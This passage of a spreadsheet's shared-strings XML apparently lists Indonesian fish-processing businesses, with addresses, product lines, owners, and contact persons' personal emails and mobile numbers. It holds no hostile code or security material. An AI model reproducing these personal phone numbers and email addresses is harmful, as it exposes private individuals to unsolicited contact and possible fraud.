    <t>poklahsarikanbandeng@gmail.com</t>
  </si>
  <si>
    <t>KARYANI   0823 3277 6599  RAHMA DISKAN PAMEKASAN 081286124598</t>
  </si>
  <si>
    <t>Dr. Rusman B Ghazali, M.Si</t>
  </si>
  <si>
    <t>ekoprm54@gmail.com</t>
  </si>
  <si>
    <t>Eko Purwanto, 081338086869</t>
  </si>
  <si>
    <t xml:space="preserve">Eko Purwanto </t>
  </si>
  <si>
    <t>CV. HORIZON GROUP</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto No.108, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah</t>
  </si>
  <si>
    <t>Tuna Loin Masak Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Muliadi</t>
  </si>
  <si>
    <t>fadlyharahap1@gmail.com</t>
  </si>
  <si>
    <t>0631-3270004</t>
  </si>
  <si>
    <t>Fadly Utama Hrp, 082322970008</t>
  </si>
  <si>
    <t>MARGO KAREP</t>
  </si>
  <si>
    <t>Desa Rangan RT 05, Kec. Kuaro, Kabupaten Paser</t>
  </si>
  <si>
    <t>Umiatun</t>
  </si>
  <si>
    <t>Kuaro</t>
  </si>
  <si>
    <t>Rangan</t>
  </si>
  <si>
    <t>margokarep2001@gmail.com</t>
  </si>
  <si>
    <t>Umiatun. 082154539539</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Kerang Segar, Kerang Beku, Cephalopoda Segar, Cephalopod Beku, Kepiting Beku, Kepiting Segar</t>
  </si>
  <si>
    <t>nuansagunautama.banten@gmail.com</t>
  </si>
  <si>
    <t>APRIYADI / 081288588798</t>
  </si>
  <si>
    <t>HILDA IRANY EFFENDY SP</t>
  </si>
  <si>
    <t>PT. INTI PERSADA BAHARI BARU</t>
  </si>
  <si>
    <t>Jl. Dr. Makaliwe 1 No. 17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Fillet Ikan Pelagis Beku, Fillet Ikan Demersal Beku</t>
  </si>
  <si>
    <t>MUHAMAD KHAIDIR</t>
  </si>
  <si>
    <t>Grogol Petamburan</t>
  </si>
  <si>
    <t>qcpersadaintibaharibaru@gmail.com</t>
  </si>
  <si>
    <t>ANGGI SURYA</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Kerang Segar, Kerang Beku, Cephalopod Beku, Kepiting Beku, Cephalopoda Segar</t>
  </si>
  <si>
    <t>MOHAMAD MULYONO</t>
  </si>
  <si>
    <t>dyanyuliani09@gmail.com</t>
  </si>
  <si>
    <t>0812-9224-6496</t>
  </si>
  <si>
    <t>NURDIANA YULIANI</t>
  </si>
  <si>
    <t>PT. SAMUDERA LAWRENCE</t>
  </si>
  <si>
    <t>Jl. Raya Perancis No.2 Room 1 Komplek Pergudangan Kosambi Permai Blok E No.40, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Daging Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>DIMYATI SANTOSA</t>
  </si>
  <si>
    <t>nashrul.fatah@gmail.com</t>
  </si>
  <si>
    <t>Pergudangan Legundi Business Park D 19A, Kel. Banjaran, Kec. Driyorejo, Kabupaten Gresik</t>
  </si>
  <si>
    <t>naselsiswanto@sutraco.com</t>
  </si>
  <si>
    <t>031-99009059</t>
  </si>
  <si>
    <t>LIDIA &amp; 082131756301</t>
  </si>
  <si>
    <t>LIDIAWATI TUNRU</t>
  </si>
  <si>
    <t>PT. KEONG NUSANTARA ABADI</t>
  </si>
  <si>
    <t>Jl. Raya Bogo - Kunjang RT 008 RW 001, Kel. Mojoayu, Kec. Plemahan, Kabupaten Kediri</t>
  </si>
  <si>
    <t>Bekicot Kaleng, Bekicot Beku</t>
  </si>
  <si>
    <t>CANDY YONCER</t>
  </si>
  <si>
    <t>Plemahan</t>
  </si>
  <si>
    <t>Mojoayu</t>
  </si>
  <si>
    <t>wiwika.wongcoco@gmail.com</t>
  </si>
  <si>
    <t>0354-526251, 0354-526252</t>
  </si>
  <si>
    <t>HENDRA GUNAWAN (081359449171)</t>
  </si>
  <si>
    <t>ZAIWANI YULIS</t>
  </si>
  <si>
    <t>PT. ARTI BUANA LAUTAN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Fillet Ikan Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>H. RAY SURYADI ARSYAD, S.IP</t>
  </si>
  <si>
    <t>artibuanaindosea@gmail.com</t>
  </si>
  <si>
    <t>ABD. RAHMAN HR / 085396947356</t>
  </si>
  <si>
    <t>Jl. Poros Toronipa, Kel. Tapulaga, Kec. Soropia, Kabupaten Konawe</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Pelagis Beku, Tuna Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Soropia</t>
  </si>
  <si>
    <t>Tapulaga</t>
  </si>
  <si>
    <t>qaqc.gmcpkdi@gmail.com</t>
  </si>
  <si>
    <t>Nuzul Ramadhan (085241534141)</t>
  </si>
  <si>
    <t>Budi Hari Nugroho</t>
  </si>
  <si>
    <t>PT. HASIL LAUT SIBOLGA</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto No.71, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah</t>
  </si>
  <si>
    <t>RUSDI</t>
  </si>
  <si>
    <t>hasillautsibolga@gmail.com</t>
  </si>
  <si>
    <t>Suang/+62 822-7702-9714</t>
  </si>
  <si>
    <t>PT. JALUR SUTERA MAS</t>
  </si>
  <si>
    <t>Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Teripang Kering, Perut Ikan Kering, Ikan Asin Kering</t>
  </si>
  <si>
    <t>VIKTORIA SISKADEVANI</t>
  </si>
  <si>
    <t>psuteramas@gmail.com</t>
  </si>
  <si>
    <t>PT. KAMILA SAMUDERA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Dermaga PHPT Blok B No 3 - 4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>KASUM ACUN</t>
  </si>
  <si>
    <t>mfanibdg@gmail.com</t>
  </si>
  <si>
    <t>PT. JAYA UTAMA QUALITY</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah Raya, Kel. Buloa, Kec. Tallo, Kota Makassar</t>
  </si>
  <si>
    <t>Liu On Sin</t>
  </si>
  <si>
    <t>jayautamaquality@gmail.com</t>
  </si>
  <si>
    <t>Siswanto - +628126111776  ,  Liu On Sin +6285329873333</t>
  </si>
  <si>
    <t>PT. SUMBER KALIMANTAN ABADI</t>
  </si>
  <si>
    <t>Jl. Mulawarman No.99, Kel. Manggar, Kec. Balikpapan Timur, Kota Balikpapan</t>
  </si>
  <si>
    <t xml:space="preserve">Yos Sumitro </t>
  </si>
  <si>
    <t xml:space="preserve">Balikpapan Timur </t>
  </si>
  <si>
    <t xml:space="preserve">Manggar </t>
  </si>
  <si>
    <t>edystn.bpp@gmail.com</t>
  </si>
  <si>
    <t>0542-772100</t>
  </si>
  <si>
    <t>Edy Setiawan &amp; 08215785228</t>
  </si>
  <si>
    <t xml:space="preserve">Edy Setiawan </t>
  </si>
  <si>
    <t>UD. TRIFAKU MANDIRI</t>
  </si>
  <si>
    <t>Jl. Raya Wonosari, Kel. Wonosari, Kec. Gading Rejo, Kabupaten Pringsewu</t>
  </si>
  <si>
    <t>Lainnya, Beku, Kering</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Kerupuk Ikan, Pempek Ikan, Stik Lele</t>
  </si>
  <si>
    <t>NURUL ADHI ASTUTI</t>
  </si>
  <si>
    <t>Gading Rejo</t>
  </si>
  <si>
    <t>Wonosari</t>
  </si>
  <si>
    <t>ssiasadi@gmail.com</t>
  </si>
  <si>
    <t>NURUL ADHI ASTUTI &amp;  085279399632</t>
  </si>
  <si>
    <t>CV. MARWA ABADI JAYA</t>
  </si>
  <si>
    <t>Jl. Beringin I RT 09, Kel. Selumit Pantai, Kec. Tarakan Tengah, Kota Tarakan</t>
  </si>
  <si>
    <t>Bandeng Segar, Cephalopoda Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Amrang</t>
  </si>
  <si>
    <t>marwaabadijaya@gmail.com</t>
  </si>
  <si>
    <t>Saparuddin/Jhay &amp; 082158668330</t>
  </si>
  <si>
    <t>PT. MBEGOR JAYA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Kertanegara No.18, Kel. Jember Kidul, Kec. Kaliwates, Kabupaten Jember</t>
  </si>
  <si>
    <t>Sambal Ikan</t>
  </si>
  <si>
    <t>Yosie Ermawan, SH. MH</t>
  </si>
  <si>
    <t>Kaliwates</t>
  </si>
  <si>
    <t>Jember Kidul</t>
  </si>
  <si>
    <t>yosie_1946@yahoo.com</t>
  </si>
  <si>
    <t>Yosie Ermawan / 085101747899</t>
  </si>
  <si>
    <t>ZAHRA</t>
  </si>
  <si>
    <t>BTN Pole Indah Mas, Jl.Mutiara Blok H 28, Kel. Darma, Kec. Polewali, Kabupaten Polewali Mandar</t>
  </si>
  <si>
    <t>Abon Ikan, Amplang Ikan</t>
  </si>
  <si>
    <t>Meizahra</t>
  </si>
  <si>
    <t>Darma</t>
  </si>
  <si>
    <t>sarahsyr003@gmail.com</t>
  </si>
  <si>
    <t>Meizahra 081355784275</t>
  </si>
  <si>
    <t>Sumiati</t>
  </si>
  <si>
    <t>PT. SINAR MALALUGIS MAKMUR</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K No.1-2, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Daging Tuna Beku</t>
  </si>
  <si>
    <t>SUNTAK, SUWARDI, ANG ENG TJUN</t>
  </si>
  <si>
    <t>Sinar.malalugishaccp@gmail.com</t>
  </si>
  <si>
    <t>021-66672390</t>
  </si>
  <si>
    <t>ANG ENG TJUN (62-21) 66672390</t>
  </si>
  <si>
    <t>ANG ENG TJUN</t>
  </si>
  <si>
    <t>PT. AYU BUMI SEJATI</t>
  </si>
  <si>
    <t>Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Berlapis Tepung Beku, Udang Rebus Beku, Udang Mentah Beku, Paha Kodok Beku</t>
  </si>
  <si>
    <t>UNANG</t>
  </si>
  <si>
    <t>Medan Labuhan</t>
  </si>
  <si>
    <t>Pekan Labuhan</t>
  </si>
  <si>
    <t>haccp.ayubumisejati@gmail.com</t>
  </si>
  <si>
    <t>KASIAMAN &amp; 085358482050</t>
  </si>
  <si>
    <t>UD. JUANDA AQUATIC</t>
  </si>
  <si>
    <t>Jl. Puri No.24, Kel. Kotamatsum III, Kec. Medan kota, Kota Medan</t>
  </si>
  <si>
    <t>BURHAN</t>
  </si>
  <si>
    <t>Medan kota</t>
  </si>
  <si>
    <t>Kotamatsum III</t>
  </si>
  <si>
    <t>juandaquatic24@gmail.com</t>
  </si>
  <si>
    <t>061 7323347</t>
  </si>
  <si>
    <t>Sherly 085270521787</t>
  </si>
  <si>
    <t>PT. BERKAT MINA BAHARI TATURAN</t>
  </si>
  <si>
    <t>Desa Taturan, Kec. Gemeh, Kabupaten Kepulauan Talaud</t>
  </si>
  <si>
    <t>Herman Suisa</t>
  </si>
  <si>
    <t>Gemeh</t>
  </si>
  <si>
    <t>Taturan</t>
  </si>
  <si>
    <t>ptberkatminabaharitaturan@gmail.com</t>
  </si>
  <si>
    <t>Mina Marengki</t>
  </si>
  <si>
    <t>Jl. Masjid Annur, Kel. Girian Bawah, Kec. Girian, Kota Bitung</t>
  </si>
  <si>
    <t>cenhongbtg@gmail.com</t>
  </si>
  <si>
    <t>0438-37714</t>
  </si>
  <si>
    <t>Made</t>
  </si>
  <si>
    <t>PERUM PERIKANAN INDONESIA UNIT SIMEULUE</t>
  </si>
  <si>
    <t>Jl. Letkol Ali Hasan TPI, Kel. Lugu, Kec. Simeulue Timur, Kabupaten Simeulue</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Andresum</t>
  </si>
  <si>
    <t>Simeulue Timur</t>
  </si>
  <si>
    <t>Lugu</t>
  </si>
  <si>
    <t>perumperindosimeulue@gmail.com</t>
  </si>
  <si>
    <t>Andresum 082386101001</t>
  </si>
  <si>
    <t>GOMBARA</t>
  </si>
  <si>
    <t xml:space="preserve"> Jl. KHA Jabbar Ashiry No.1, Kel. Pai, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Muhammad Iqbal, Lc</t>
  </si>
  <si>
    <t>gombaraumkm@gmail.com</t>
  </si>
  <si>
    <t>Ismail  (08114167141)</t>
  </si>
  <si>
    <t>H. ISMAIL JALIL</t>
  </si>
  <si>
    <t>USAHA PAK UMAR</t>
  </si>
  <si>
    <t>Jl. HOS Cokroaminoto No.77, Kel. Sungailiat, Kec. Sungailiat, Kabupaten Bangka</t>
  </si>
  <si>
    <t>Abon Ikan, Amplang Ikan, Getas Ikan, Kerupuk Telur Cumi-Cumi, Stik Ikan</t>
  </si>
  <si>
    <t>Yuliana</t>
  </si>
  <si>
    <t>Sungailiat</t>
  </si>
  <si>
    <t>umarumar8695@gmail.com</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>nabila.dus123@gmail.com</t>
  </si>
  <si>
    <t>0361-242441</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok E No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Tuna Segar, Ikan Demersal Beku, Udang Beku, Produk Perikanan Bernilai Tambah Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>kartikaqc@gmail.com</t>
  </si>
  <si>
    <t>021-22664452</t>
  </si>
  <si>
    <t>KARTIKA 081288095477</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Kerang Segar, Kerang Beku, Cephalopoda Segar, Cephalopoda Beku, Kepiting Beku, Kepiting Segar</t>
  </si>
  <si>
    <t>sca.banten@gmail.com</t>
  </si>
  <si>
    <t>JIMMY RUMAWAS / 081318387798</t>
  </si>
  <si>
    <t>IRWANTO</t>
  </si>
  <si>
    <t>PT. BUAH MIMPI</t>
  </si>
  <si>
    <t>Jl. Kima 17 Kav. DD - 9A, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>H. DAULENG TJAMPA</t>
  </si>
  <si>
    <t>buahmimpi2021@yahoo.com</t>
  </si>
  <si>
    <t>0411 4723144</t>
  </si>
  <si>
    <t>JON SARIAMANTO</t>
  </si>
  <si>
    <t>PT. SUMBERJAYA BUMI LESTARI</t>
  </si>
  <si>
    <t>Jl. Peternakan 2 No.28, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>sumberjaya.b.a@hotmail.com</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami, Kawasan Pergudangan Karunia Sulawesi Blok C No.11, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>agus_cempaga@yahoo.com</t>
  </si>
  <si>
    <t>AGUSSALIM/ +6251354889123</t>
  </si>
  <si>
    <t>UD. JAYA ABADI SENTOSA</t>
  </si>
  <si>
    <t>Kima XVII, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>CHRISWAN</t>
  </si>
  <si>
    <t>udjasmakassar@gmail.com</t>
  </si>
  <si>
    <t>CHRISWAN - 085298592589</t>
  </si>
  <si>
    <t>PT. SUMBER LAUT ALAM</t>
  </si>
  <si>
    <t>Jl. Patimura Telaga Punggur No.55 RT 001 RW 001, Kel. Kabil, Kec. Nongsa , Kota Batam</t>
  </si>
  <si>
    <t>Dody jhon</t>
  </si>
  <si>
    <t>sumberlautalampt@gmail.com</t>
  </si>
  <si>
    <t>Deasy Wulandari &amp; 081907557244</t>
  </si>
  <si>
    <t>dody jhon</t>
  </si>
  <si>
    <t>UD. PEMPEK UMI ABI</t>
  </si>
  <si>
    <t>Jl. AKBP. H. Umar No.598 RT 022 RW 001, Kel. Ario Kemuning, Kec. Kemuning, Kota Palembang</t>
  </si>
  <si>
    <t>Eka Yunalia</t>
  </si>
  <si>
    <t>Kemuning</t>
  </si>
  <si>
    <t>Ario Kemuning</t>
  </si>
  <si>
    <t>pempekumiabi08@gmail.com</t>
  </si>
  <si>
    <t>Eka Yunalia 082177861165</t>
  </si>
  <si>
    <t>CV. ANUGERAH SAMUDERA</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Beku, Lainnya, Segar, Asap</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Rendang Belut, Kerang Segar, Rumput Laut Berbumbu, Salmon Segar, Trout Segar, Kerang Beku, Ikan Pelagis Beku, Telur Salmon Beku, Salmon Beku, Trout Beku, Cephalopoda Beku, Daging Tuna Beku, Gurita Berbumbu, Salmon Asap</t>
  </si>
  <si>
    <t>Edy Dwi Christianti</t>
  </si>
  <si>
    <t>Belimbing</t>
  </si>
  <si>
    <t>ali_asadulah@yahoo.co.id</t>
  </si>
  <si>
    <t>024-6593093</t>
  </si>
  <si>
    <t>Jl. Kima 15 Kavling R No.4C, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tuna Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>ptbmimakassar@gmail.com</t>
  </si>
  <si>
    <t>0411-4742028</t>
  </si>
  <si>
    <t>PT. REZEKI SAMUDRA ABADI</t>
  </si>
  <si>
    <t>Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Udang Beku, Kerang Beku, Seafood Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Raymond</t>
  </si>
  <si>
    <t>Durjela</t>
  </si>
  <si>
    <t>rezekisamudraabadi21@gmail.com</t>
  </si>
  <si>
    <t>Bima 081287538964</t>
  </si>
  <si>
    <t>PT. SEBATIK JAYA MANDIRI</t>
  </si>
  <si>
    <t>Jl. PPI RT 06 RW 02, Kel. Mansapa, Kec. Nunukan Selatan, Kabupaten Nunukan</t>
  </si>
  <si>
    <t>M. Arief Kadir</t>
  </si>
  <si>
    <t>Nunukan Selatan</t>
  </si>
  <si>
    <t>Mansapa</t>
  </si>
  <si>
    <t>sebatikjayamandiri1@gmail.com</t>
  </si>
  <si>
    <t>M. Arief Kadir / 087804050937</t>
  </si>
  <si>
    <t>PT. AGAR SWALLOW</t>
  </si>
  <si>
    <t>Jl. Branta Mulia, Kel. Karang Asem Timur, Kec. Citeureup, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Tepung Agar-agar, Rumput Laut Kering</t>
  </si>
  <si>
    <t>Hendrico Soewardjono</t>
  </si>
  <si>
    <t>Karang Asem Timur</t>
  </si>
  <si>
    <t>yun08.agarswallow@gmail.com</t>
  </si>
  <si>
    <t>021-87943076</t>
  </si>
  <si>
    <t>Yun DF 087743223328</t>
  </si>
  <si>
    <t>CV. EAST STAR TRADING</t>
  </si>
  <si>
    <t>Jl. Pantai, Dusun Torohgusung, Kel. Santigi, Kec. Toli-Toli Utara, Kabupaten Toli-Toli</t>
  </si>
  <si>
    <t xml:space="preserve">Eddy Hartono </t>
  </si>
  <si>
    <t xml:space="preserve">Toli-Toli Utara </t>
  </si>
  <si>
    <t xml:space="preserve">Santigi </t>
  </si>
  <si>
    <t>EASTSTARTRADE@GMAIL.COM</t>
  </si>
  <si>
    <t>082394297469; 087765462010</t>
  </si>
  <si>
    <t>Eddy Hartono &amp; 082394297469; 087765462010</t>
  </si>
  <si>
    <t>UD. NUR AMELIA</t>
  </si>
  <si>
    <t>Jl. Abdul Hamid RT 01, Kel. Kasai, Kec. Pulau Derawan, Kabupaten Berau</t>
  </si>
  <si>
    <t>Udang Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Pulau Derawan</t>
  </si>
  <si>
    <t>Kasai</t>
  </si>
  <si>
    <t>ud.nuramelia2016@gmail.com</t>
  </si>
  <si>
    <t>IR'EL TING</t>
  </si>
  <si>
    <t>Jaga XII, Kel. Watutumou, Kec. Kalawat, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Nova Tineke Lumentah</t>
  </si>
  <si>
    <t>Watutumou</t>
  </si>
  <si>
    <t>novalumentah12@gmail.com</t>
  </si>
  <si>
    <t>Nova 081242143675</t>
  </si>
  <si>
    <t>RIZKI BULIAN</t>
  </si>
  <si>
    <t>Jl. Hutan Lindung RT 16, Kel. Rengas Condong, Kec. Muara Bulian, Kabupaten Batang Hari</t>
  </si>
  <si>
    <t>Stik Udang, Teri Crispy</t>
  </si>
  <si>
    <t>VIVI ARMANTI</t>
  </si>
  <si>
    <t>Rengas Condong</t>
  </si>
  <si>
    <t>mamaren2010@gmail.com</t>
  </si>
  <si>
    <t>CV. HENGLY JAYA GUSTAMA</t>
  </si>
  <si>
    <t>Jl. Alah Air, Kel. Selat Panjang Selatan, Kec. Tebing Tinggi, Kabupaten Kepulauan Meranti</t>
  </si>
  <si>
    <t>Saryono</t>
  </si>
  <si>
    <t>Tebing Tinggi</t>
  </si>
  <si>
    <t>Selat Panjang Selatan</t>
  </si>
  <si>
    <t>hinglypratama84@gmail.com</t>
  </si>
  <si>
    <t>0811755245 / 081364670000</t>
  </si>
  <si>
    <t>Saryono / 0811755245</t>
  </si>
  <si>
    <t>Jl. Sapta Marga Blok B No. 100 RT 013 RW 003, Kel. Guntung Payung, Kec. Landasan Ulin, Kota Banjar Baru</t>
  </si>
  <si>
    <t>Alwi Angga Budiman</t>
  </si>
  <si>
    <t>Landasan Ulin</t>
  </si>
  <si>
    <t>Guntung Payung</t>
  </si>
  <si>
    <t>muaralautkalsel@gmail.com</t>
  </si>
  <si>
    <t>Roby Asharyanto 087842840111</t>
  </si>
  <si>
    <t>PT. SURI TANI PEMUKA PLANT 1</t>
  </si>
  <si>
    <t>Jl. Mundu Pesisir No. 33 KM 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>sri.dewi@japfa.com</t>
  </si>
  <si>
    <t>Sri / 083801791309</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT UNIT CIREBON</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon - Losari KM 28, Kel. Malakasari, Kec. Gebang, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>kelola Mina Laut</t>
  </si>
  <si>
    <t>Malakasari</t>
  </si>
  <si>
    <t>ipoenkx@yahoo.com</t>
  </si>
  <si>
    <t>Anissa Angga A. (0812-3041-2091)</t>
  </si>
  <si>
    <t>Choiruddin</t>
  </si>
  <si>
    <t>AMPIANG YU'ERIN</t>
  </si>
  <si>
    <t>Jl. Raya Belinyu RT 03, Kel. Sinar Jaya Jelutung, Kec. Sungailiat, Kabupaten Bangka</t>
  </si>
  <si>
    <t>Getas Ikan, Getas Cumi-cumi, Stik Ikan, Stik Udang, Kerupuk Ikan, Kerupuk Udang, Kerupuk Cumi-cumi</t>
  </si>
  <si>
    <t>SAINI</t>
  </si>
  <si>
    <t>Sinar Jaya Jelutung</t>
  </si>
  <si>
    <t>skp.yukerin@gmail.com</t>
  </si>
  <si>
    <t>0812 7323 2832</t>
  </si>
  <si>
    <t>SAINI/ 0812 7323 2832</t>
  </si>
  <si>
    <t>DUO AYU SEHATI</t>
  </si>
  <si>
    <t>Jl. Air Mawar RT 03 RW 02, Kel. Air Mawar, Kec. Bukit Intan, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Getas Ikan, Getas Cumi-cumi, Kerupuk Telur Cumi-Cumi, Kemplang Ikan</t>
  </si>
  <si>
    <t>JOHN YANG KINARDI</t>
  </si>
  <si>
    <t>Air Mawar</t>
  </si>
  <si>
    <t>skp.sehati@gmail.com</t>
  </si>
  <si>
    <t>HENDRI/ 081291326613</t>
  </si>
  <si>
    <t>HENDRI</t>
  </si>
  <si>
    <t>CV. RAJA PATIN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Mesjid No.289, Kel. Sugiharjo Dusun II, Kec. Batang Kuis, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Keripik Kulit Patin, Keripik Kulit Nila</t>
  </si>
  <si>
    <t>Fitriadi</t>
  </si>
  <si>
    <t>Batang Kuis</t>
  </si>
  <si>
    <t>Sugiharjo Dusun II</t>
  </si>
  <si>
    <t>fitriadi.can1977@gmail.com</t>
  </si>
  <si>
    <t>Fitriadi / 08116075026</t>
  </si>
  <si>
    <t>PT. BUMI LAUT PERTIWI</t>
  </si>
  <si>
    <t>Jl. A. Mappainga Barombong, Kel. Barombong, Kec. Tamalate, Kota Makassar</t>
  </si>
  <si>
    <t>Eva Yuliana Rovida</t>
  </si>
  <si>
    <t>Barombong</t>
  </si>
  <si>
    <t>bumilautpertiwi01@gmail.com</t>
  </si>
  <si>
    <t>UMI - 085922201777</t>
  </si>
  <si>
    <t>Primadona</t>
  </si>
  <si>
    <t>Citra Sudiang Estate Blok A1 No. 33 Kel. Sudiang Raya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>H. Mukhaidir Halik</t>
  </si>
  <si>
    <t>Sudiang Raya</t>
  </si>
  <si>
    <t>ptcbntuna@gmail.com</t>
  </si>
  <si>
    <t>Arul - 085255554100</t>
  </si>
  <si>
    <t>Musnawati</t>
  </si>
  <si>
    <t>ERSYA DAMAI</t>
  </si>
  <si>
    <t>Lingkungan III, Kel. Meras, Kec. Bunaken, Kota Manado</t>
  </si>
  <si>
    <t>Ikan Kayu, Abon Ikan</t>
  </si>
  <si>
    <t>ESTEFANS TAIWILAN</t>
  </si>
  <si>
    <t>Meras</t>
  </si>
  <si>
    <t>fansdive@yahoo.com</t>
  </si>
  <si>
    <t>Fans 085256607250</t>
  </si>
  <si>
    <t>RAMANTHA KITCHEN</t>
  </si>
  <si>
    <t>Lingkungan II, Kel. Batuputih Bawah, Kec. Ranowulu, Kota Bitung</t>
  </si>
  <si>
    <t>Abon Ikan, Sambal Roa</t>
  </si>
  <si>
    <t>Margareta Kakante</t>
  </si>
  <si>
    <t>Ranowulu</t>
  </si>
  <si>
    <t>Batuputih Bawah</t>
  </si>
  <si>
    <t>margaretakakante02@gmail.com</t>
  </si>
  <si>
    <t>Margareta Kakante &amp; 081244494282</t>
  </si>
  <si>
    <t>PT. PANORAMA KEMAS INDAH</t>
  </si>
  <si>
    <t>Kp. Pulau Nipah, Jembatan II, Kel. Pulau Setokok, Kec. Bulang, Kota Batam</t>
  </si>
  <si>
    <t>SINYO SULIMBRO</t>
  </si>
  <si>
    <t>pokipanorama@gmail.com</t>
  </si>
  <si>
    <t>Jl. Dermaga Baru No.9 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara</t>
  </si>
  <si>
    <t>diandwijayanti1994@gmail.com</t>
  </si>
  <si>
    <t>021-66696531</t>
  </si>
  <si>
    <t>DIAN / 085210897544</t>
  </si>
  <si>
    <t>DIAN DWI JAYANTI</t>
  </si>
  <si>
    <t>PT. KHOM FOODS</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok I Kav V, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Ricky Tandriono</t>
  </si>
  <si>
